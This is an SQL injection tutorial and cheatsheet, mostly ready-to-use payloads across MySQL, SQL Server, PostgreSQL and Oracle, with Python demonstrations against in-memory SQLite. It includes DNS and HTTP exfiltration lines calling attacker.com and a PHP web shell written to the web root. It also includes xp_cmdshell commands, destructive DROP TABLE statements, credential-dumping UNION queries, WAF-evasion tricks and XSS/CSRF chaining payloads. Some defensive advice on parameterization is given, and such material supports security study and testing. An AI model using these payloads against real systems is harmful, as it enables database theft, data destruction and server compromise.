Injection Attacks: The Basics

Injection attacks occur when adversaries embed malicious inputs into an application, exploiting improper input handling or lack of sanitization. These inputs manipulate the application's logic, bypass authentication mechanisms, exfiltrate sensitive data, or even compromise the underlying server.

Think of it this way: you give instructions to an application, like asking it to fetch user details. But instead, you sneak in an additional command, saying, “Fetch user details and delete all records!” The application, unaware of the deceit, executes both commands without question.

Such attacks are particularly effective against systems that inadequately validate or sanitize user inputs, enabling attackers to modify SQL queries, execute arbitrary commands, or inject malicious code into dynamic contexts like web pages or logs.

Why Are Injection Attacks So Dangerous?

Data Exposure: Leaks confidential information like usernames, passwords, and financial details.
System Compromise: Can result in full control of the server through remote code execution.
Financial Damage: Breaches can lead to legal repercussions, loss of user trust, and financial liabilities.

Injection attacks are versatile and can target various systems, including databases, operating systems, and even APIs.

SQL Injection: Introduction, Types, and Examples

What is SQL Injection?
SQL Injection (SQLi) is a web security vulnerability in which attackers manipulate the SQL queries an application sends to its database in order to read unauthorized data, modify it, or destroy it. It occurs when user input is concatenated into a query without being escaped or parameterized, so that the input changes the logic of the query instead of being treated as data. Below is an overview of the different types of SQL injection, with examples. Unless marked otherwise, the payloads use MySQL syntax.
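As an added illustration (not code from the original page), the following Python script builds an in-memory SQLite database and contrasts a login query assembled by string concatenation with a parameterized one. The users table, the credentials and the function names are constructed for this example.

```python
import sqlite3


def make_db():
    # Constructed sample data: one user row, not taken from any real system.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'alice', 's3cret')")
    return db


def login_vulnerable(db, username, password):
    """Builds the query by concatenation: user input is parsed as SQL syntax."""
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_safe(db, username, password):
    """Parameterized query: input is bound as data and never reaches the parser."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


def demo():
    """Runs the same inputs through both versions and returns the outcomes."""
    db = make_db()
    return {
        # Legitimate credentials succeed in both versions.
        "vuln_real": login_vulnerable(db, "alice", "s3cret"),
        "safe_real": login_safe(db, "alice", "s3cret"),
        # Tautology: AND binds tighter than OR, so username='alice' alone matches.
        "vuln_tautology": login_vulnerable(db, "alice' OR '1'='1", "wrong"),
        # Comment: the password check is commented out of the statement.
        "vuln_comment": login_vulnerable(db, "alice' --", "wrong"),
        # The same payload is just a non-existent username when bound as a parameter.
        "safe_tautology": login_safe(db, "alice' OR '1'='1", "wrong"),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {'logged in' if outcome else 'rejected'}")
```

The vulnerable version accepts both payloads without knowing the password; the parameterized version rejects them because the quote and the comment marker are part of the bound value, not of the statement.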

1. Entry Point Detection

The entry point for an SQL injection is typically any input field or parameter where user input interacts with the backend database without proper sanitization. Common methods to identify these entry points include:

Error Message Testing
Input fields can be tested for SQL injection using payloads like:

' OR 'apple' = 'apple
' OR LENGTH(database()) > 0 --
' AND 3*3=9

A database error, or a page that renders differently than it does with benign input, indicates a likely injection point. Note that MySQL only treats -- as a comment when it is followed by whitespace, so send a trailing space (or use #) when the injected text must swallow the rest of the query.

Logical Condition Testing
Try injecting the following logical statements into a numeric or quoted parameter:

page.asp?product=2 AND 5>3 --
page.asp?product=3' AND 6=6 --
page.asp?product=1 AND (SELECT COUNT(*) FROM users) > 0 --

Unicode Transformation Testing
Experiment with Unicode representations to bypass filters:

U+0391 (GREEK CAPITAL LETTER ALPHA) → %CE%91
U+0025 (PERCENT SIGN) → %25
U+03BB (GREEK SMALL LETTER LAMBDA) → %CE%BB

These can be inserted into SQL queries like:

' AND 'Α'='Α (with U+0391 for Α)
' AND '%25'='%25 (using the percent sign)

These only help when the application transliterates or normalizes the input back to ASCII (for example through NFKC normalization or a best-fit charset conversion) after the filter has run; otherwise the database compares the Unicode strings literally and the filter was never the problem.

Timing-Based Attacks
Use time delays to test for blind injection:

SELECT SLEEP(5); --
page.php?id=1' AND SLEEP(3) --
page.php?id=1; WAITFOR DELAY '00:00:10'; -- (for MSSQL)
page.php?id=1; SELECT pg_sleep(5); -- (for PostgreSQL)

If the page takes noticeably longer to load, the injected expression was evaluated and the parameter is probably injectable. The stacked forms (semicolon followed by a second statement) only work when the driver allows several statements per call; the inline AND SLEEP() form does not need stacking. Repeat the test with a different delay to rule out ordinary network latency.

Advanced Union Queries
Explore database tables or columns using UNION-based injections. The injected SELECT must return the same number of columns (with compatible types) as the original query; determine the count first with ORDER BY n or by adding NULLs to UNION SELECT NULL, NULL, ... until the error disappears:

1 UNION SELECT username, password FROM users; --
1 UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema=database(); --
1 UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users'; --

Tautology-Based Injections
Try always-true conditions:

' OR 'banana'='banana
' OR NOW() = NOW() --
' OR 100=100#

Combined Character Injection
Combine special characters and URL-encoded values to bypass filters:

'%20OR%20'1'%3D'1
'; DROP TABLE users; --
'%20UNION%20SELECT%20%2A%20FROM%20admin%20--

The encoded forms decode to ' OR '1'='1 and ' UNION SELECT * FROM admin --. The web server decodes them before the query is built, so they only evade filters that inspect the raw, undecoded request.

2. Confirming SQL Injection

Boolean-Based Confirmation
This method confirms SQL Injection by injecting payloads with conditions that always evaluate to TRUE or FALSE. Observing changes in the application's behavior or output helps identify vulnerabilities.

http://example.com/product?id=5 AND 1=1 -- (TRUE condition)
http://example.com/product?id=5 AND 1=2 -- (FALSE condition)

Time-Based Confirmation
Time-based confirmation relies on injecting queries that deliberately introduce delays in the database's response. If a noticeable delay occurs, the application may be vulnerable.

MySQL: http://example.com/product?id=5 AND SLEEP(5) --
MSSQL: http://example.com/product?id=5; WAITFOR DELAY '00:00:05'; --
PostgreSQL: http://example.com/product?id=5; SELECT pg_sleep(5); --

Error-Based Confirmation
This technique involves injecting payloads that generate SQL syntax or logical errors. Observing detailed error messages can help confirm and map the database structure.

http://example.com/product?id=5'
http://example.com/product?id=5 AND UPDATEXML(null,concat(0x3a,(SELECT database())),null) -- (MySQL: the invalid XPath expression makes the error message echo the database name)

In-Band vs. Out-of-Band Confirmation

  • In-Band Confirmation: Uses the same communication channel (e.g., the HTTP response) to confirm the injection, often using UNION SELECT to fetch database data.
  • Out-of-Band Confirmation: Uses external communication (e.g., DNS or HTTP requests) to confirm the injection and retrieve data indirectly.
  • In-Band (UNION): http://example.com/product?id=5 UNION SELECT null, username, password FROM users --
  • Out-of-Band (DNS): http://example.com/product?id=5; EXEC master..xp_dirtree '\\attacker.com\test' -- (SQL Server; the UNC path makes the server resolve attacker.com)

Alternate Data Types for Validation
This method involves injecting unexpected data types into fields to validate SQL Injection, for example strings or special characters into a numeric field, or a negative id that is guaranteed not to match so that only the rows added by the UNION are displayed.

Numeric Field: http://example.com/product?id=-1 UNION SELECT 1,2,3 --

3. Exploitation Techniques

Identifying and Exploiting SQL Injection Vulnerabilities

UNION-Based SQL Injection
Attackers use the UNION operator to merge an additional SELECT into the original query, extracting data from other tables. See also: Oracle Error/Union based SQL Injection Cheatsheet.

' UNION SELECT NULL, NULL --
' UNION SELECT username, password FROM users --
' UNION SELECT database(), version() --
' UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema=database() --
' UNION SELECT 1, GROUP_CONCAT(username, 0x3a, password) FROM users --

Error-Based SQL Injection

Error messages returned by the database are exploited to extract data: the payload forces an error whose message contains the result of a subquery. See also: MSSQL Error Based SQL Injection Cheatsheet.

1' AND (SELECT 1/0) -- (SQL Server: raises "Divide by zero error"; MySQL returns NULL instead of an error)
1' AND UPDATEXML(NULL, CONCAT(0x3a, (SELECT database())), NULL) -- (MySQL)
1' AND EXTRACTVALUE(1, CONCAT(0x3a, (SELECT user()))) -- (MySQL)
1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database()) -- (MySQL: raises "Subquery returns more than 1 row"; this confirms the injection but leaks nothing unless LIMIT 1 is added and the value is reflected through one of the functions above)

Boolean-Based Blind SQL Injection
This technique relies on observing how the application responds to true/false conditions.

1' AND 1=1 -- (True)
1' AND 1=2 -- (False)
1' AND LENGTH(database())=8 --
1' AND ASCII(SUBSTRING((SELECT user()), 1, 1))>64 --
1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0 --

Time-Based Blind SQL Injection
Time delays are used to infer whether conditions are true or false, based on server response times.

' AND SLEEP(5) -- (MySQL)
' OR IF(1=1, SLEEP(5), 0) -- (MySQL)
' OR pg_sleep(5) -- (PostgreSQL)
' AND WAITFOR DELAY '00:00:05' -- (SQL Server)
' AND IF(ASCII(SUBSTRING((SELECT @@version),1,1))=77, SLEEP(5), 0) -- (MySQL; delays only when the version string starts with 'M')

Out-of-Band (OOB) SQL Injection Relies on external communication (e.g., DNS or HTTP) to exfiltrate data when no direct

LOAD_FILE('\\\\attacker.com\\file') (MySQL on Windows; the UNC path forces a DNS lookup of attacker.com)
EXEC master..xp_dirtree '\\attacker.com\share' (SQL Server; same UNC trick)
SELECT UTL_HTTP.request('http://attacker.com') FROM DUAL; (Oracle; data can be carried in the URL)
SELECT ... INTO OUTFILE '\\\\attacker.com\\data' (MySQL on Windows; requires the FILE privilege)

Stacked Queries SQL Injection
Allows multiple statements to be executed in one request by separating them with semicolons.

1'; DROP TABLE users; --
1'; INSERT INTO admin (username, password) VALUES ('attacker', 'pass'); --
1'; EXEC xp_cmdshell 'whoami'; -- (SQL Server; xp_cmdshell is disabled by default and enabling it needs sysadmin)
1'; CREATE TABLE hacked(data TEXT); --
1'; SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname='target_db'; -- (PostgreSQL)

Whether stacking works depends on the database and the client library: SQL Server and PostgreSQL accept it with most drivers, MySQL only when the client enables multi-statement support (for example mysqli_multi_query), and Oracle does not support it at all.

4. Advanced SQLi in Different Databases

These techniques target various database management systems (DBMS) such as MySQL, PostgreSQL, MSSQL, Oracle, and SQLite, each with its own syntax and behavior (comment style, string concatenation operator, delay and file-access functions, support for stacked queries). The attacks exploit the way each engine parses and executes the injected SQL. Reference

5. Database Enumeration and Data Exfiltration

This section deals with techniques used to explore and extract sensitive data from a database through an SQL injection (SQLi) vulnerability.

Extracting Database, Table, Column Names
These payloads extract metadata from the database, including the name of the database, its tables, and their columns (MySQL syntax; the three selected columns must match the column count of the original query).

' UNION SELECT null, database(), null --

Extracts the current database name.

' UNION SELECT null, table_name, null FROM information_schema.tables WHERE table_schema = 'your_database' --

Extracts table names from a specified database.

' UNION SELECT null, column_name, null FROM information_schema.columns WHERE table_name = 'your_table' --

Extracts column names from a specified table.

Extracting Data from Encrypted or Encoded Columns
These payloads only work when the data is merely encoded, or when the encryption key is available to the query (for example hard-coded in a stored procedure or recoverable from another table); the database cannot decrypt data for which it does not hold the key.

' UNION SELECT null, AES_DECRYPT(encrypted_column, 'encryption_key'), null FROM your_table --

Decrypts the column with MySQL's AES_DECRYPT using a known key.

' UNION SELECT null, CONVERT(FROM_BASE64(encrypted_column), CHAR), null FROM your_table --

Decodes Base64-encoded data from the column (Base64 is an encoding, not encryption, so no key is involved).

Using INFORMATION_SCHEMA for Database Info
These payloads extract useful database information, such as schemas, tables, and other metadata.

' UNION SELECT schema_name, null, null FROM information_schema.schemata --

Extracts all schema names from the database.

' UNION SELECT table_name, null, null FROM information_schema.tables WHERE table_schema = 'your_database' --

Extracts table names from a specific schema.

File System Enumeration via SQLi
These payloads allow an attacker to read files on the database server through SQL injection.

' UNION SELECT null, LOAD_FILE('/etc/passwd'), null --

Attempts to read /etc/passwd on a Unix-based system (MySQL; requires the FILE privilege and a secure_file_priv setting that does not restrict the path).

' UNION SELECT null, UTL_FILE.get_raw('file_path'), null --

Attempts to read a file on the server through Oracle's UTL_FILE package. Note that UTL_FILE exposes procedures (FOPEN, GET_LINE, GET_RAW) rather than functions callable from a SELECT; using it needs a PL/SQL block, a directory object the database user may read, and execute rights on the package, so it requires an injection point that can run PL/SQL.

Data Exfiltration via DNS Tunneling
These payloads exfiltrate data over DNS by placing it in the hostname of a UNC path that the database server then resolves (MySQL on Windows). The hex-encoded value must fit in a 63-byte DNS label, so long values are split across several requests with SUBSTRING.

' UNION SELECT LOAD_FILE(CONCAT('\\\\', HEX(column_name), '.attacker.com\\x')) FROM your_table --

Encodes the value as hex, makes it a subdomain of a domain controlled by the attacker, and triggers a DNS lookup that the attacker's name server logs.

6. Blind SQL Injection

A type of SQL injection attack where the attacker does not receive error messages or direct output from the database, but instead infers data based on indirect responses. It relies on the behavior of the application, such as changes in page content, time delays, or status codes, to extract sensitive information.

True/False Based Blind SQLi

' OR 1=1 -- (True)
' OR 1=2 -- (False)

Error-Based Blind SQL Injection

' AND 1=1 -- (Returns the normal result)
' AND 1=2 -- (Returns an error page or a visibly different response)

Here the application does not echo the error text; the attacker only learns that an error occurred (for example from a 500 status) and uses that as the true/false signal.

Time-Based Blind SQL Injection

' AND SLEEP(5) -- (Delays the response for 5 seconds if the condition is true)

Bitwise Blind SQLi Techniques

' AND (SELECT ASCII(SUBSTRING((SELECT database()), 1, 1)) & 1) = 1 --

This payload checks the least significant bit of the first character of the database name.

Conditional Blind SQL Injection

' AND IF(1=1, SLEEP(5), 0) -- (Delays for 5 seconds if the condition is true)

Advanced Boolean-Based Blind SQLi

' AND 1=1 -- (True condition, no change in output)
' AND 1=2 -- (False condition, different response or no data)
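The page describes boolean and bitwise blind extraction in prose; the following Python script, added here and not part of the original cheatsheet, simulates a vulnerable product lookup in an in-memory SQLite database and recovers a password from it using only true/false responses. Both the binary-search variant (about seven requests per character) and the bit-by-bit variant from this section are implemented. The tables, the password value and the oracle function are constructed for the example; against a real target the oracle would send an HTTP request and compare the response. SQLite's unicode() plays the role of MySQL's ASCII().

```python
import sqlite3

# Constructed target data for the example; not from any real system.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE products (id INTEGER, name TEXT)")
db.execute("INSERT INTO products VALUES (1, 'widget')")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 'Tr0ub4dor')")


def page_shows_product(injected_id: str) -> bool:
    """Simulated vulnerable endpoint: the id parameter is concatenated into the query.
    The only observable output is whether a product row was rendered."""
    sql = "SELECT name FROM products WHERE id = " + injected_id
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # an error page also reads as "no product"


def oracle(condition: str) -> bool:
    """Boolean-based blind: AND the condition onto a known-good id (1)."""
    return page_shows_product("1 AND (" + condition + ")")


# Scalar subquery whose value we want to extract, character by character.
SUBQ = "(SELECT password FROM users WHERE username='admin')"


def extract_length(max_len: int = 64) -> int:
    """One request per candidate length until the oracle answers true."""
    for n in range(1, max_len + 1):
        if oracle(f"length({SUBQ}) = {n}"):
            return n
    raise RuntimeError("length not found within max_len")


def extract_char_binary(pos: int) -> str:
    """Binary search over printable ASCII (32..126): about 7 requests per character."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"unicode(substr({SUBQ}, {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_char_bitwise(pos: int) -> str:
    """Bitwise variant from the page: one request per bit, 7 bits for ASCII."""
    value = 0
    for bit in range(7):
        mask = 1 << bit
        if oracle(f"(unicode(substr({SUBQ}, {pos}, 1)) & {mask}) = {mask}"):
            value |= mask
    return chr(value)


def dump_password(method=extract_char_binary) -> str:
    """Recovers the whole value using the chosen per-character strategy."""
    return "".join(method(i) for i in range(1, extract_length() + 1))


if __name__ == "__main__":
    print("binary search :", dump_password(extract_char_binary))
    print("bitwise       :", dump_password(extract_char_bitwise))
```

The binary-search and bitwise strategies return the same string; the bitwise one costs a fixed 7 requests per character and is easier to reason about when responses are noisy, while binary search is usually a request or two cheaper.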

7. Chained and Multi-Stage Injection

Attacks where multiple SQL injection vulnerabilities are chained together or executed in stages to extract data or execute more complex attacks.

Multiple Query Injection

' ; DROP TABLE users -- (Executes multiple SQL queries, potentially dropping a table)

Blind SQLi Chaining

' UNION SELECT NULL, column1, column2 FROM users -- (Once the table and column names have been recovered through blind extraction, a UNION query retrieves the column values in one step)

Multi-Step SQLi Attacks
Step 1: ' UNION SELECT NULL, table_name FROM information_schema.tables -- (Extracts table names)
Step 2: ' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users' -- (Extracts column names)
Step 3: ' UNION SELECT username, password FROM users -- (Uses the names found in the previous steps to extract the data)

SQLi with Second-Order Injection
The payload is stored safely at first (for example through a parameterized INSERT) and only becomes SQL when the application later reads it back and concatenates it into another query. Registering the username admin'-- is harmless on insert; a later password-change feature that builds UPDATE users SET password='...' WHERE username='admin'--' from the stored name changes the real admin's password instead of the attacker's.
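The second-order flow above, as an added example that is not from the original page: a Python script with an in-memory SQLite table where registration is parameterized but a later password change concatenates the stored username. The table layout, account names and function names are constructed for the example.

```python
import sqlite3


def fresh_db():
    # Constructed sample data: a single administrator account.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'original-admin-pw')")
    return db


def register(db, username, password):
    # First-order use is safe: the parameterized INSERT stores the payload verbatim as data.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def stored_username(db, username):
    # Later the application reads the name back from its own table and trusts it.
    return db.execute("SELECT username FROM users WHERE username = ?",
                      (username,)).fetchone()[0]


def change_password_vulnerable(db, username, new_password):
    # Second-order flaw: the trusted, stored value is concatenated into a new query.
    sql = ("UPDATE users SET password = '" + new_password +
           "' WHERE username = '" + username + "'")
    db.execute(sql)


def change_password_safe(db, username, new_password):
    # Parameterized everywhere, including for values that came from the database.
    db.execute("UPDATE users SET password = ? WHERE username = ?",
               (new_password, username))


def password_of(db, username):
    return db.execute("SELECT password FROM users WHERE username = ?",
                      (username,)).fetchone()[0]


def run_attack(change_password):
    """Registers the payload username, triggers the later query, returns admin's password."""
    db = fresh_db()
    # Step 1: the attacker registers a username that is itself an injection payload.
    register(db, "admin'--", "anything")
    # Step 2: the password-change feature loads that name and uses it in dynamic SQL.
    name = stored_username(db, "admin'--")
    change_password(db, name, "pwned")
    return password_of(db, "admin")


if __name__ == "__main__":
    print("concatenated UPDATE :", run_attack(change_password_vulnerable))
    print("parameterized UPDATE:", run_attack(change_password_safe))
```

With the concatenated UPDATE the statement becomes UPDATE users SET password = 'pwned' WHERE username = 'admin'--', the trailing quote is commented out, and the administrator's password changes; with the parameterized UPDATE only the attacker's own row is touched. Data read from the database must be treated as untrusted input exactly like data read from the request.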

Encoding and Chaining SQLi Payloads

' UNION SELECT NULL, column1, column2 FROM users -- URL-encoded as
%27%20UNION%20SELECT%20NULL,%20column1,%20column2%20FROM%20users%20--

The encoded payload is decoded by the web server before it reaches the query, so it only evades filters that inspect the raw request. Filters that decode first are unaffected; double encoding (%2527 for the quote) is the usual next step, and works only when the application itself decodes the value a second time.

8. Exploiting SQL Injection for Privilege Escalation

This category focuses on leveraging SQL injection to gain elevated privileges, bypass access controls, or escalate access to administrative or operating system levels within the target system.

Using SQLi for Administrative Access

' UNION SELECT 1, 'admin', 'password' FROM users --

Appends a fake result row, so that a login routine which reads id, username and password from the result set sees a matching "admin" user.

' OR username='admin' AND password='admin123' --

Tests whether a user admin with a guessed password exists; the OR makes the original condition irrelevant.

' UNION ALL SELECT username, password FROM admin_table --

Extracts the contents of a dedicated admin table.

Role-Based Privilege Escalation

' OR role='admin' --

Makes the query match the administrator's row, so an application that identifies the "current user" from the first row returned treats the attacker as that administrator.

' UNION SELECT NULL, username, role FROM users WHERE role='admin' --

Extracts all administrative users for privilege escalation.

' AND (SELECT CASE WHEN (role='admin') THEN 1 ELSE 0 END) --

Checks for administrative roles using a conditional query.

Escalating to Operating System Level via SQLi

' UNION SELECT 1, LOAD_FILE('/etc/passwd') --

Reads OS-level files to extract sensitive information (MySQL; FILE privilege required).

' UNION SELECT NULL, '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php' --

Writes a web shell into the web root; the selected value becomes the file content, so it must carry the PHP code. Requires the FILE privilege, a web root writable by the database server's OS user, and a secure_file_priv setting that does not restrict the path.

' AND 1=CONVERT(INT, (SELECT SYSTEM_USER)) --

Forces a type-conversion error on SQL Server whose message reveals the database login, which tells the attacker which privileges the injected queries run with.

' OR 1=1; EXEC xp_cmdshell 'net user admin newpassword' --

Executes OS commands through the xp_cmdshell extended stored procedure (SQL Server; disabled by default and requires sysadmin to enable).

9. Payload Construction and Customization

This category focuses on building complex and tailored payloads to bypass filters, evade detection, and achieve deeper exploitation by combining SQL Injection with other attack vectors.

Crafting Complex Injection Payloads

' UNION SELECT username, password FROM users WHERE username='admin' --

Retrieves user credentials using union-based injections.

' OR (SELECT COUNT(*) FROM users WHERE username LIKE '%admin%') > 0 --

Injects a subquery to test for specific user existence.

' AND 1=IF(1=1, SLEEP(5), 0) --

Injects a conditional payload to delay server response.

Injecting Custom Functions into SQL Queries

' OR 1=1; SELECT user(), database() --

Stacked query retrieving database and user info; the second statement's result set is usually not displayed, so combine it with an error- or time-based channel, or use UNION instead.

' UNION SELECT NULL, CONCAT('Username: ', username, ' Password: ', password) FROM users --

Combines custom outputs into a single payload.

' UNION SELECT 1, CHAR(115,121,115,116,101,109,95,117,115,101,114) --

Uses CHAR() to build the string system_user without quote characters, which defeats filters that block or escape quotes.

Custom SQL Injection via User Input

admin' OR '1'='1' --

Standard bypass payload to inject via input fields.

' UNION SELECT email FROM subscribers WHERE name LIKE '%test%' --

Customizes input to retrieve emails from specific patterns.

' OR id=(SELECT MAX(id) FROM orders) --

Extracts the most recent entry from an orders table.

Polymorphic Payloads for Evasion

'UnIoN/**/sElecT username, password/**/fRoM/**/users --

Breaks query syntax for evasion while maintaining functionality.

' OR '1' LIKE '1%' --

Variant of the tautology that avoids the literal '1'='1' pattern many filters look for.

'; EXEC('SEL'+'ECT @@version') --

Builds the keyword from concatenated fragments. This only works where the database evaluates the resulting string as SQL, as SQL Server's EXEC() does; plain string concatenation elsewhere produces a string value, never a keyword.

Combining SQLi with Other Exploits (XSS, CSRF)

'; UPDATE users SET bio='<script>alert(document.cookie)</script>' WHERE username='victim'; --

Uses stacked SQLi to store an XSS payload in a field that is later rendered to other users (stored XSS delivered through SQLi).

<img src='http://malicious.com' onerror="document.write('<iframe src=http://victim.com/sqlattack></iframe>')">

An XSS payload that makes the victim's browser load the SQLi request, so the injection arrives with the victim's session cookies.

<form method="POST" action="http://victim.com/admin"><input type="hidden" name="query" value="admin' OR '1'='1"></form><script>document.forms[0].submit()</script>

Combines SQL Injection with CSRF: the auto-submitted form sends the injected value from the victim's authenticated browser.

10. Blind SQL Injection (Advanced Techniques)

Blind SQL Injection (SQLi) is a type of SQL injection where the attacker cannot directly see the output of their queries. Instead, they infer information by observing the application's behavior, such as changes in page content, HTTP responses, or execution delays. Advanced techniques involve leveraging logical, conditional, and time-based operations to extract sensitive data, bypass security mechanisms, and gain unauthorized access. Reference

11. Exploiting Stored Procedures for SQLi

SQL injection vulnerabilities occur whenever input is used to construct an SQL query without being adequately constrained or sanitized. Dynamic SQL (building queries by string concatenation) opens the door to these vulnerabilities, and stored procedures are no exception: a procedure that concatenates its arguments into a string and runs it with EXEC or sp_executesql is as injectable as application code, while one that uses parameters throughout is not. SQL injection lets an attacker execute SQL under the privileges of the account the application uses to connect to the database. Reference

12. Error-Based SQL Injection (Advanced)

Advanced error-based SQL Injection involves leveraging database error messages to extract sensitive information, bypass security measures, and analyze system configurations.

SQL Error Message Analysis
Analyze database error messages to identify information like version, user, and database name (MySQL; the invalid XPath expression in EXTRACTVALUE/UPDATEXML makes the error message echo the value, truncated to 32 characters, so long values are read in pieces with SUBSTRING).

Extract database version: ' AND EXTRACTVALUE(1, CONCAT(0x7e, @@version)) --
Extract current user: ' AND UPDATEXML(1, CONCAT(0x7e, USER()), 1) --

Error Message Obfuscation Techniques
Use encoding or filter-bypass tricks to avoid detection while still triggering the error.

Hexadecimal string literal: ' AND EXTRACTVALUE(1, CONCAT(0x7e, 0x76657273696f6e)) -- (0x76657273696f6e is just the string "version"; it shows that hex literals pass a quote filter, but to extract the version use @@version)
MySQL versioned comment instead of whitespace: '/*!50000AND*/ UPDATEXML(1, CONCAT(0x7e, DATABASE()), 1) --

Extracting Data from Database Errors
Exploit error responses to extract database structure information, such as table and column names.

Extract a table name: ' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT table_name FROM information_schema.tables LIMIT 1))) --
Extract a column name: ' AND UPDATEXML(1, CONCAT(0x7e, (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1)), 1) --

Using Exception Handling for Exfiltration
Trigger forced errors that reveal information in the error message.

Extract the database name via a duplicate-key error in GROUP BY: ' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x7e, DATABASE(), 0x7e, FLOOR(RAND(0)*2)) AS error_message FROM information_schema.tables GROUP BY error_message) t) -- (RAND(0) makes the sequence deterministic, so the "Duplicate entry '~dbname~1' for key" error is guaranteed rather than intermittent)

Leveraging SQL Errors to Extract Sensitive Data
Use errors to learn about the server environment, configuration, or data directories.

Identify the data directory: ' AND EXTRACTVALUE(1, CONCAT(0x7e, @@datadir)) --
Extract the server port: ' AND EXTRACTVALUE(1, CONCAT(0x7e, @@port)) --

MySQL Error based SQL Injection Cheatsheet

13. Out-of-Band SQL Injection

Using DNS for Data Exfiltration
Exfiltrate data by embedding it in a hostname that the database server is made to resolve; the attacker runs, or has query logging on, the authoritative name server for that domain. File functions given a UNC path are the usual trigger on Windows hosts. The value must consist of characters valid in a hostname, so encode it (HEX) first and keep each label under 64 bytes.

Extract the database name via a DNS lookup (MySQL on Windows):

' UNION SELECT LOAD_FILE(CONCAT('\\\\', HEX(DATABASE()), '.attacker.com\\a')) --

Extract a username via a DNS lookup (SQL Server; stacked query):

'; DECLARE @h VARCHAR(1024); SELECT @h = '\\' + (SELECT TOP 1 username FROM users) + '.attacker.com\a'; EXEC master..xp_dirtree @h; --

HTTP-Based Out-of-Band SQLi
Use HTTP requests to an attacker-controlled server to carry the data. This needs a database function that makes outbound HTTP requests. MySQL has none: INTO OUTFILE writes to the local file system only and cannot send data to a URL.

Oracle, sending the database user in the URL (subject to the network ACLs of the database):

' UNION SELECT UTL_HTTP.request('http://attacker.com/?d=' || (SELECT user FROM dual)) FROM dual --

Oracle, DNS variant through a name lookup:

' UNION SELECT UTL_INADDR.get_host_address((SELECT user FROM dual) || '.attacker.com') FROM dual --

Leveraging Email for Data Exfiltration
Exploit server-side mail functionality to send query results to the attacker. On SQL Server the current mechanism is Database Mail (sp_send_dbmail); the older xp_sendmail procedure was removed in recent versions. A configured mail profile and a stacked-query injection point are required:

'; DECLARE @b NVARCHAR(MAX); SELECT @b = @@version; EXEC msdb.dbo.sp_send_dbmail @profile_name='default', @recipients='attacker@example.com', @subject='SQLi Data', @body=@b; --

Blind SQL injection with out-of-band data exfiltration

Out-of-Band SQLi with Web Shells
Where the database can write files into the web root, a web shell gives an interactive channel that no longer depends on the injection. Write the shell with INTO OUTFILE (MySQL; FILE privilege and a permissive secure_file_priv required):

' UNION SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php' --

Then use the shell to run commands and exfiltrate, for example over DNS from the web server itself:

http://victim.com/shell.php?cmd=nslookup%20$(hostname).attacker.com

LOAD_FILE() reads local files only and cannot fetch a URL, so payloads such as LOAD_FILE('http://attacker.com/shell.php') retrieve nothing.

14. SQL Injection in NoSQL Databases

NoSQL Injection is an injection attack against NoSQL databases such as MongoDB and CouchDB. No SQL is involved, but user input is likewise inserted into query objects or operators (for example $ne, $gt or $where in MongoDB) to alter their logic and gain unauthorized access or retrieve sensitive data. Reference

15. WAF and IDS/IPS Bypass Techniques

SQL Injection (SQLi) attacks are commonly blocked by Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). However, attackers use various evasion techniques to bypass these security mechanisms.

SQLi Evasion with URL Encoding

URL encoding, also known as percent encoding, converts special characters (quotes, spaces, equals signs) into encoded representations (e.g., %27 for a single quote). The web server decodes the parameter before the application builds the query, so the database always sees the original payload. Encoding therefore only evades a WAF that matches on the raw request without decoding; most modern WAFs decode once, which is why attackers move on to double encoding (%2527, decoded once by the WAF and again by the application, which only works when the application does decode twice) or to encodings the WAF does not normalize, such as overlong UTF-8 or charset mismatches. Example Payloads:

' OR 1=1 -- can be encoded as %27%20OR%201%3D1%20--
admin'-- can be encoded as admin%27--

This technique is only useful against WAFs whose pattern matching runs on undecoded input.

Using Case Sensitivity for Evasion

SeLeCt instead of SELECT
FrOm instead of FROM
WhErE instead of WHERE

SQL keywords are case-insensitive in every major database, so mixed case keeps the query valid while defeating WAF and IDS/IPS rules that match keywords case-sensitively.

Obfuscating SQL Queries for WAF Evasion

admin' -- can be obfuscated as admin'/* (MySQL accepts an unterminated comment, which discards the rest of the query just like --)
1 OR 1=1 can be written as 1/**/OR/**/1=1 (inline comments replace the spaces a signature expects between keywords)

Obfuscation makes the payload look different from the signature while the database parser still reads the same statement.

Evading WAFs with Custom Headers
WAFs typically inspect request URLs, parameters, and bodies. Attackers can evade detection by placing payloads in less scrutinized HTTP headers such as User-Agent, X-Forwarded-For, or Referer, which applications often write to the database (visitor statistics, audit logs, rate limiting by client IP) using the same unsafe concatenation.

Injecting into X-Forwarded-For: X-Forwarded-For: 127.0.0.1' OR 1=1 --
Injecting into User-Agent: User-Agent: admin' OR 1=1 --

A header is only an injection point if the application stores or queries its value; when it does, the header may sit outside the fields the WAF rules inspect.

Using Polymorphic Payloads for WAF Bypass
